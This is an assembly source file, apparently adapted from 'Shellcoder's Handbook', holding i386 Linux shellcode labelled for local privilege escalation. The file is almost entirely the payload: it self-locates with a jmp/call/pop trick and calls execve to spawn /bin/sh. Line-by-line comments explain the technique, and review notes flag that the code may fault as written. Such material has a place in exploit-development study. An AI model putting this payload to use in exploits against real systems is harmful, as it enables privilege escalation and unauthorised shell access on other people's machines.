execve_sh.asm
; *****************************************************
; Basic Shellcode for LPE
;
; Makes an execve() low level syscall and executes
; /bin/sh. It uses relative addresses to make it more
; portable
;
; From Jack Koziol's awesome book "Shellcoder's Handbook"
;
; ****************************************************
; nasm -f elf execve2.asm
section .text
global _start
;-----------------------------------------------------------------------
; _start: execve("/bin/sh", argv, envp) through the i386 Linux
;         int 0x80 interface (32-bit registers, eax = syscall number).
; Syntax: NASM (Intel operand order), assembled with `nasm -f elf`.
; In:     nothing (ELF entry point / raw shellcode entry)
; Out:    does not return on success; on failure execution falls
;         through past `int 0x80` into the GotoCall/data bytes.
; Regs:   esi = address of the '/bin/sh' bytes (self-located below)
;         eax = 0x0b (execve), ebx = pathname, ecx = argv, edx = envp
;
; Argument block built at runtime, relative to esi:
;   esi+0..6   "/bin/sh"        from the `db` line
;   esi+7      0x00             NUL terminator, stored at runtime
;   esi+8      <esi>            argv[0] = pointer to the string
;   esi+12     0x00000000       argv[1] = NULL; edx also points here,
;                               so envp is an empty (NULL-first) array
;
; NOTE(review): the comments below name placeholder bytes J / AAAA /
; KKKK, but the `db` line at the end holds only the 7 bytes of
; '/bin/sh'. The stores to [esi+7], [esi+8] and [esi+12] therefore
; land past the defined data. In a normally linked ELF, .text is
; usually not writable, so these self-modifying stores are likely
; to fault unless the section is made writable — confirm before use
; as a standalone test binary.
;-----------------------------------------------------------------------
_start:
; Self-locating jmp / call / pop idiom: `call shellcode` pushes the
; address of the byte right after the call — the '/bin/sh' data — so
; `pop esi` recovers that address with no absolute reference. This is a
; classic, widely signatured shellcode pattern.
jmp short GotoCall
shellcode:
pop esi                        ; esi = &'/bin/sh' (return address pushed by `call`)
xor eax,eax                    ; eax = 0: reused as the NUL byte and the NULL pointer below
mov byte [esi + 7], al         ; [esi+7] = 0x00: NUL-terminate "/bin/sh" (book's 'J' slot)
lea ebx, [esi]                 ; ebx = esi (equivalent to `mov ebx, esi`)
mov long [esi + 8], ebx        ; [esi+8] = &"/bin/sh": argv[0] (book's 'AAAA' slot)
                               ; NOTE(review): `long` is not the usual NASM size keyword
                               ; (`dword` is); confirm it assembles on the NASM version used.
mov long [esi + 12], eax       ; [esi+12] = NULL: argv[1] terminator (book's 'KKKK' slot)
mov byte al, 0x0b              ; eax = 11 = execve on i386 (upper bytes already zero)
mov ebx, esi                   ; arg1: pathname = "/bin/sh"
lea ecx, [esi + 8]             ; arg2: argv = { &"/bin/sh", NULL }
lea edx, [esi + 12]            ; arg3: envp = { NULL }
int 0x80                       ; execve(ebx, ecx, edx); no return on success
GotoCall:
call shellcode                 ; pushes address of the data below, then jumps back up
db '/bin/sh'                   ; 7 bytes, no terminator: the NUL is written at runtime